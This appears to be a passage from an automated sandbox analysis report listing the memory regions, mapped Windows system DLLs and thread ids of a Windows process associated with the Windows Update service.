Region: id = 3215 start_va = 0x1910000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 3216 start_va = 0x28a0000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 3217 start_va = 0x3760000 end_va = 0x37dffff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 3218 start_va = 0x3900000 end_va = 0x397ffff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 3219 start_va = 0x39b0000 end_va = 0x3a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 3220 start_va = 0x3ff0000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 3221 start_va = 0x40a0000 end_va = 0x411ffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3222 start_va = 0x4120000 end_va = 0x419ffff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3223 start_va = 0x42c0000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 3224 start_va = 0x4340000 end_va = 0x443ffff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 3225 start_va = 0x4460000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 3226 start_va = 0x44e0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 3227 start_va = 0x46f0000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 3228 start_va = 0x47b0000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 3229 start_va = 0x4850000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 3230 start_va = 0x48e0000 end_va = 0x495ffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 3231 start_va = 0x49a0000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 3232 start_va = 0x4a20000 end_va = 0x4a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 3233 start_va = 0x4ae0000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 3234 start_va = 0x4b60000 end_va = 0x4bdffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 3235 start_va = 0x4c50000 end_va = 0x4ccffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 3236 start_va = 0x4d10000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 3237 start_va = 0x4da0000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 3238 start_va = 0x4eb0000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 3239 start_va = 0x4f70000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 3240 start_va = 0x5060000 end_va = 0x50dffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 3241 start_va = 0x5150000 end_va = 0x51cffff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 3242 start_va = 0x51f0000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 3243 start_va = 0x5320000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 3244 start_va = 0x5420000 end_va = 0x549ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 3245 start_va = 0x54f0000 end_va = 0x556ffff entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 3246 start_va = 0x5640000 end_va = 0x56bffff entry_point = 0x0 region_type = private name = "private_0x0000000005640000" filename = "" Region: id = 3247 start_va = 0x57b0000 end_va = 0x582ffff entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 3248 start_va = 0x7fef8ef0000 end_va = 0x7fef8f05fff entry_point = 0x7fef8ef0000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 3249 start_va = 0x7fffff2c000 end_va = 0x7fffff2dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff2c000" filename = "" Region: id = 3250 start_va = 0x7fffff2e000 end_va = 0x7fffff2ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff2e000" filename = "" Region: id = 3251 start_va = 0x7fffff30000 end_va = 0x7fffff31fff entry_point = 0x0 region_type = private name = "private_0x000007fffff30000" filename = "" Region: id = 3252 start_va = 0x7fffff32000 end_va = 0x7fffff33fff entry_point = 0x0 region_type = private name = "private_0x000007fffff32000" filename = "" Region: id = 3253 start_va = 0x7fffff34000 end_va = 0x7fffff35fff entry_point = 0x0 region_type = private name = "private_0x000007fffff34000" filename = "" Region: id = 3254 start_va = 0x7fffff36000 end_va = 0x7fffff37fff entry_point = 0x0 region_type = private name = "private_0x000007fffff36000" filename = "" Region: id = 3255 start_va = 0x7fffff38000 end_va = 0x7fffff39fff entry_point = 0x0 region_type = private name = "private_0x000007fffff38000" filename = "" Region: id = 3256 start_va = 0x7fffff3a000 end_va = 0x7fffff3bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff3a000" filename = "" Region: id = 3257 start_va = 0x7fffff3c000 end_va = 0x7fffff3dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff3c000" filename = "" Region: id = 3258 start_va = 0x7fffff3e000 end_va = 0x7fffff3ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff3e000" filename = "" Region: id = 3259 start_va = 0x7fffff40000 end_va = 0x7fffff41fff entry_point = 0x0 region_type = private name = "private_0x000007fffff40000" filename = "" Region: id = 3260 start_va = 0x7fffff42000 end_va = 0x7fffff43fff entry_point = 0x0 region_type = private name = "private_0x000007fffff42000" filename = "" Region: id = 3261 start_va = 0x7fffff44000 end_va = 0x7fffff45fff entry_point = 0x0 region_type = private name = "private_0x000007fffff44000" filename = "" Region: id = 3262 start_va = 0x7fffff46000 end_va = 0x7fffff47fff entry_point = 0x0 region_type = private name = "private_0x000007fffff46000" filename = "" Region: id = 3263 start_va = 0x7fffff48000 end_va = 0x7fffff49fff entry_point = 0x0 region_type = private name = "private_0x000007fffff48000" filename = "" Region: id = 3264 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 3265 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 3266 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 3267 start_va = 0x7fffff50000 end_va = 0x7fffff51fff entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 3268 start_va = 0x7fffff52000 end_va = 0x7fffff53fff entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 3269 start_va = 0x7fffff54000 end_va = 0x7fffff55fff entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 3270 start_va = 0x7fffff56000 end_va = 0x7fffff57fff entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 3271 start_va = 0x7fffff58000 end_va = 0x7fffff59fff entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 3272 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 3273 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 3274 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 3275 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 3276 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 3277 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 3278 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 3279 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 12368 start_va = 0x31d0000 end_va = 0x324ffff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 12369 start_va = 0x3370000 end_va = 0x33effff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 12370 start_va = 0x3580000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 12371 start_va = 0x3750000 end_va = 0x37cffff entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 12372 start_va = 0x3890000 end_va = 0x390ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 12373 start_va = 0x3940000 end_va = 0x39bffff entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 12374 start_va = 0x3a20000 end_va = 0x3a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 12375 start_va = 0x4e30000 end_va = 0x4eaffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 12376 start_va = 0x5290000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 12377 start_va = 0x53a0000 end_va = 0x541ffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 12378 start_va = 0x55c0000 end_va = 0x563ffff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 12379 start_va = 0x56e0000 end_va = 0x575ffff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 12380 start_va = 0x5870000 end_va = 0x58effff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 12381 start_va = 0x5900000 end_va = 0x597ffff entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 12382 start_va = 0x5980000 end_va = 0x5b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005980000" filename = "" Region: id = 12383 start_va = 0x5bc0000 end_va = 0x5c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005bc0000" filename = "" Region: id = 12384 start_va = 0x5c60000 end_va = 0x5cdffff entry_point = 0x0 region_type = private name = "private_0x0000000005c60000" filename = "" Region: id = 12385 start_va = 0x5ce0000 end_va = 0x5d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ce0000" filename = "" Region: id = 12386 start_va = 0x5d90000 end_va = 0x5e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d90000" filename = "" Region: id = 12387 start_va = 0x5e90000 end_va = 0x5f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005e90000" filename = "" Region: id = 12388 start_va = 0x5f60000 end_va = 0x5fdffff entry_point = 0x0 region_type = private name = "private_0x0000000005f60000" filename = "" Region: id = 12389 start_va = 0x6060000 end_va = 0x60dffff entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 12390 start_va = 0x60f0000 end_va = 0x616ffff entry_point = 0x0 region_type = private name = "private_0x00000000060f0000" filename = "" Region: id = 12391 start_va = 0x6170000 end_va = 0x61effff entry_point = 0x0 region_type = private name = "private_0x0000000006170000" filename = "" Region: id = 12392 start_va = 0x6230000 end_va = 0x62affff entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 12393 start_va = 0x62b0000 end_va = 0x632ffff entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 12394 start_va = 0x63e0000 end_va = 0x645ffff entry_point = 0x0 region_type = private name = "private_0x00000000063e0000" filename = "" Region: id = 12395 start_va = 0x64b0000 end_va = 0x652ffff entry_point = 0x0 region_type = private name = "private_0x00000000064b0000" filename = "" Region: id = 12396 start_va = 0x6550000 end_va = 0x65cffff entry_point = 0x0 region_type = private name = "private_0x0000000006550000" filename = "" Region: id = 12397 start_va = 0x6640000 end_va = 0x66bffff entry_point = 0x0 region_type = private name = "private_0x0000000006640000" filename = "" Region: id = 12398 start_va = 0x6750000 end_va = 0x67cffff entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 12399 start_va = 0x67e0000 end_va = 0x685ffff entry_point = 0x0 region_type = private name = "private_0x00000000067e0000" filename = "" Region: id = 12400 start_va = 0x68a0000 end_va = 0x691ffff entry_point = 0x0 region_type = private name = "private_0x00000000068a0000" filename = "" Region: id = 12401 start_va = 0x6a80000 end_va = 0x6afffff entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 12402 start_va = 0x7fef38c0000 end_va = 0x7fef3b12fff entry_point = 0x7fef38c0000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 12403 start_va = 0x7fef46a0000 end_va = 0x7fef46bafff entry_point = 0x7fef46a0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 12404 start_va = 0x7fef46c0000 end_va = 0x7fef4939fff entry_point = 0x7fef46c0000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 12405 start_va = 0x7fef67d0000 end_va = 0x7fef6840fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 12406 start_va = 0x7fef7800000 end_va = 0x7fef7863fff entry_point = 0x7fef7800000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 12407 start_va = 0x7fef7870000 end_va = 0x7fef78e0fff entry_point = 0x7fef7870000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 12408 start_va = 0x7fefb6f0000 end_va = 0x7fefb6fefff entry_point = 0x7fefb6f0000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 12409 start_va = 0x7ffffef8000 end_va = 0x7ffffef9fff entry_point = 0x0 region_type = private name = "private_0x000007ffffef8000" filename = "" Region: id = 12410 start_va = 0x7ffffefa000 end_va = 0x7ffffefbfff entry_point = 0x0 region_type = private name = "private_0x000007ffffefa000" filename = "" Region: id = 12411 start_va = 0x7ffffefc000 end_va = 0x7ffffefdfff entry_point = 0x0 region_type = private name = "private_0x000007ffffefc000" filename = "" Region: id = 12412 start_va = 0x7ffffefe000 end_va = 0x7ffffefffff entry_point = 0x0 region_type = private name = "private_0x000007ffffefe000" filename = "" Region: id = 12413 start_va = 0x7fffff00000 end_va = 0x7fffff01fff entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 12414 start_va = 0x7fffff02000 end_va = 0x7fffff03fff entry_point = 0x0 region_type = private name = "private_0x000007fffff02000" filename = "" Region: id = 12415 start_va = 0x7fffff04000 end_va = 0x7fffff05fff entry_point = 0x0 region_type = private name = "private_0x000007fffff04000" filename = "" Region: id = 12416 start_va = 0x7fffff06000 end_va = 0x7fffff07fff entry_point = 0x0 region_type = private name = "private_0x000007fffff06000" filename = "" Region: id = 12417 start_va = 0x7fffff08000 end_va = 0x7fffff09fff entry_point = 0x0 region_type = private name = "private_0x000007fffff08000" filename = "" Region: id = 12418 start_va = 0x7fffff0a000 end_va = 0x7fffff0bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff0a000" filename = "" Region: id = 12419 start_va = 0x7fffff0c000 end_va = 0x7fffff0dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff0c000" filename = "" Region: id = 12420 start_va = 0x7fffff0e000 end_va = 0x7fffff0ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff0e000" filename = "" Region: id = 12421 start_va = 0x7fffff10000 end_va = 0x7fffff11fff entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 12422 start_va = 0x7fffff12000 end_va = 0x7fffff13fff entry_point = 0x0 region_type = private name = "private_0x000007fffff12000" filename = "" Region: id = 12423 start_va = 0x7fffff14000 end_va = 0x7fffff15fff entry_point = 0x0 region_type = private name = "private_0x000007fffff14000" filename = "" Region: id = 12424 start_va = 0x7fffff16000 end_va = 0x7fffff17fff entry_point = 0x0 region_type = private name = "private_0x000007fffff16000" filename = "" Region: id = 12425 start_va = 0x7fffff18000 end_va = 0x7fffff19fff entry_point = 0x0 region_type = private name = "private_0x000007fffff18000" filename = "" Region: id = 12426 start_va = 0x7fffff1a000 end_va = 0x7fffff1bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff1a000" filename = "" Region: id = 12427 start_va = 0x7fffff1c000 end_va = 0x7fffff1dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff1c000" filename = "" Region: id = 12428 start_va = 0x7fffff1e000 end_va = 0x7fffff1ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff1e000" filename = "" Region: id = 12429 start_va = 0x7fffff20000 end_va = 0x7fffff21fff entry_point = 0x0 region_type = private name = "private_0x000007fffff20000" filename = "" Region: id = 12430 start_va = 0x7fffff22000 end_va = 0x7fffff23fff entry_point = 0x0 region_type = private name = "private_0x000007fffff22000" filename = "" Region: id = 12431 start_va = 0x7fffff24000 end_va = 0x7fffff25fff entry_point = 0x0 region_type = private name = "private_0x000007fffff24000" filename = "" Region: id = 12432 start_va = 0x7fffff26000 end_va = 0x7fffff27fff entry_point = 0x0 region_type = private name = "private_0x000007fffff26000" filename = "" Region: id = 12433 start_va = 0x7fffff28000 end_va = 0x7fffff29fff entry_point = 0x0 region_type = private name = "private_0x000007fffff28000" filename = "" Region: id = 12434 start_va = 0x7fffff2a000 end_va = 0x7fffff2bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff2a000" filename = "" Region: id = 14124 start_va = 0x4830000 end_va = 0x492ffff entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 14125 start_va = 0x4b00000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 14126 start_va = 0x77830000 end_va = 0x77836fff entry_point = 0x77830000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 14127 start_va = 0x7fefd000000 end_va = 0x7fefd007fff entry_point = 0x7fefd000000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 14128 start_va = 0x7fefb6e0000 end_va = 0x7fefb6ecfff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 19992 start_va = 0x12b0000 end_va = 0x12c9fff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 19993 start_va = 0x1350000 end_va = 0x1350fff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 19994 start_va = 0x1360000 end_va = 0x1360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001360000" filename = "" Region: id = 19995 start_va = 0x14f0000 end_va = 0x14f7fff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 19996 start_va = 0x1500000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 19997 start_va = 0x1510000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 19998 start_va = 0x1520000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 19999 start_va = 0x1530000 end_va = 0x1530fff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 20000 start_va = 0x1640000 end_va = 0x1641fff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 20001 start_va = 0x1650000 end_va = 0x1650fff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 20002 start_va = 0x1660000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 20003 start_va = 0x1670000 end_va = 0x1677fff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 20004 start_va = 0x1700000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 20005 start_va = 0x1710000 end_va = 0x171ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 20006 start_va = 0x1820000 end_va = 0x182ffff entry_point = 0x1820000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 20007 start_va = 0x1830000 end_va = 0x183ffff entry_point = 0x1830000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 20008 start_va = 0x1840000 end_va = 0x184ffff entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 20009 start_va = 0x1850000 end_va = 0x1857fff entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 20010 start_va = 0x1860000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 20011 start_va = 0x18f0000 end_va = 0x18fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018f0000" filename = "" Region: id = 20012 start_va = 0x1900000 end_va = 0x190ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001900000" filename = "" Region: id = 20013 start_va = 0x1910000 end_va = 0x191ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001910000" filename = "" Region: id = 20014 start_va = 0x1920000 end_va = 0x192ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001920000" filename = "" Region: id = 20015 start_va = 0x1930000 end_va = 0x193ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 20016 start_va = 0x1940000 end_va = 0x194ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001940000" filename = "" Region: id = 20017 start_va = 0x1950000 end_va = 0x195ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 20018 start_va = 0x1960000 end_va = 0x1967fff entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 20019 start_va = 0x1970000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 20020 start_va = 0x1ab0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ab0000" filename = "" Region: id = 20021 start_va = 0x1ac0000 end_va = 0x1acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ac0000" filename = "" Region: id = 20022 start_va = 0x1ad0000 end_va = 0x1adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 20023 start_va = 0x1ae0000 end_va = 0x1aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ae0000" filename = "" Region: id = 20024 start_va = 0x1af0000 end_va = 0x1afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001af0000" filename = "" Region: id = 20025 start_va = 0x1b00000 end_va = 0x1b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b00000" filename = "" Region: id = 20026 start_va = 0x2540000 end_va = 0x25fffff entry_point = 0x2540000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 20027 start_va = 0x28a0000 end_va = 0x28dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 20028 start_va = 0x28e0000 end_va = 0x291ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 20029 start_va = 0x4140000 end_va = 0x41bffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20030 start_va = 0x4930000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 20031 start_va = 0x4be0000 end_va = 0x4cdffff entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 20032 start_va = 0x4eb0000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 20033 start_va = 0x4fb0000 end_va = 0x50affff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 20034 start_va = 0x50b0000 end_va = 0x51affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 20035 start_va = 0x5420000 end_va = 0x551ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 20036 start_va = 0x6b00000 end_va = 0x6efffff entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 20037 start_va = 0x6f00000 end_va = 0x7efffff entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 20038 start_va = 0x7f00000 end_va = 0x17efffff entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 20039 start_va = 0x7fefc0d0000 end_va = 0x7fefc0e4fff entry_point = 0x7fefc0d0000 region_type = mapped_file name = "aelupsvc.dll" filename = "\\Windows\\System32\\aelupsvc.dll" (normalized: "c:\\windows\\system32\\aelupsvc.dll") Region: id = 20040 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Thread: id = 31 os_tid = 0x484 Thread: id = 32 os_tid = 0x734 Thread: id = 33 os_tid = 0x308 Thread: id = 34 os_tid = 0x5c4 Thread: id = 35 os_tid = 0x90 Thread: id = 36 os_tid = 0x7c0 Thread: id = 37 os_tid = 0x560 Thread: id = 38 os_tid = 0x54c Thread: id = 39 os_tid = 0x42c Thread: id = 40 os_tid = 0x370 Thread: id = 41 os_tid = 0x784 Thread: id = 42 os_tid = 0x758 Thread: id = 43 os_tid = 0x6fc Thread: id = 44 os_tid = 0x6f0 Thread: id = 45 os_tid = 0x6e4 Thread: id = 46 os_tid = 0x6d4 Thread: id = 47 os_tid = 0x6d0 Thread: id = 48 os_tid = 0x6cc Thread: id = 49 os_tid = 0x6c4 Thread: id = 50 os_tid = 0x6b8 Thread: id = 51 os_tid = 0x6b0 Thread: id = 52 os_tid = 0x684 Thread: id = 53 os_tid = 0x494 Thread: id = 54 os_tid = 0x450 Thread: id = 55 os_tid = 0x444 Thread: id = 56 os_tid = 0x410 Thread: id = 57 os_tid = 0x40c Thread: id = 58 os_tid = 0x408 Thread: id = 59 os_tid = 0x14c Thread: id = 60 os_tid = 0x37c Thread: id = 61 os_tid = 0x11c Thread: id = 62 os_tid = 0xf0 Thread: id = 63 os_tid = 0x3f8 Thread: id = 64 os_tid = 0x3ec Thread: id = 65 os_tid = 0x3a0 Thread: id = 66 os_tid = 0x394 Thread: id = 67 os_tid = 0x390 Thread: id = 68 os_tid = 0x38c Thread: id = 69 os_tid = 0x380 Thread: id = 70 os_tid = 0x378 Thread: id = 84 os_tid = 0xac0 Thread: id = 85 os_tid = 0xac4 Thread: id = 86 os_tid = 0xac8 Thread: id = 87 os_tid = 0xacc Thread: id = 88 os_tid = 0xad0 Thread: id = 90 os_tid = 0xadc Thread: id = 91 os_tid = 0xae0 Thread: id = 92 os_tid = 0xae4 Thread: id = 93 os_tid = 0xae8 Thread: id = 94 os_tid = 0xaec Thread: id = 95 os_tid = 0xaf0 Thread: id = 96 os_tid = 0xaf4 Thread: id = 151 os_tid = 0x64 Thread: id = 153 os_tid = 0x114 Thread: id = 198 os_tid = 0x984 Thread: id = 201 os_tid = 0x9ac Thread: id = 209 os_tid = 0xa40 Thread: id = 251 os_tid = 0xc74 Thread: id = 259 os_tid = 0xcc0 Thread: id = 260 os_tid = 0xcc4 Thread: id = 276 os_tid = 0xd3c 